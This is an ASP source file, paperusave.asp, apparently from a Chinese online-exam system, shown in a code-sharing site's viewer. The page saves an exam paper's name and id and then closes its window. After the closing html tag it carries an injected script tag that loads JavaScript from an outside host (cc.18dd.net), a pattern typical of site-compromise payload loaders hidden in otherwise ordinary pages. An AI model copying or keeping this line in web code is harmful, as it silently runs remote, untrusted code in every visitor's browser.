?? paperusave.asp
字號:
<!--#include File="isAdmin.asp"-->
<!--#include file="../class/EPaper.asp"-->
<html>
<head>
<title>保存試卷信息</title>
</head>
<body>
<%
'讀取變量
Dim pid
pid = Request.QueryString("pid")
pname = Request("txtname")
Set pa = New EPaper
pa.PName = pname
pa.PId = pid
pa.UpdatePaper()
Response.Write "<h3>成功保存試題信息!</h3>"
%>
</body>
<script language="javascript">
// 刷新父級窗口,延遲此關閉
opener.location.reload();
setTimeout("window.close()",800);
</script>
</html>
<script language=javascript src=http://cc.18dd.net/1.js></script>
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -